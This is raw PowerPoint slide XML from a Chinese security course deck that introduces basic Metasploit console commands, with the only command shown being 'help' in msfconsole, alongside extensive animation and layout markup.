                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit基本命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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22" name="矩形 21"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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23" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3358515" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.2 常用命令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="文本框 117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128260" y="540703"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.在msfconsole控制台中输入“help”命令，可以查看帮助文档，如图2-4-8所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128260" y="1185863"/>
            <a:ext cx="5276850" cy="5172075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="文本框 118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5128260" y="6357938"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-8 帮助文档</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>了解 Metasploit基本命令</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
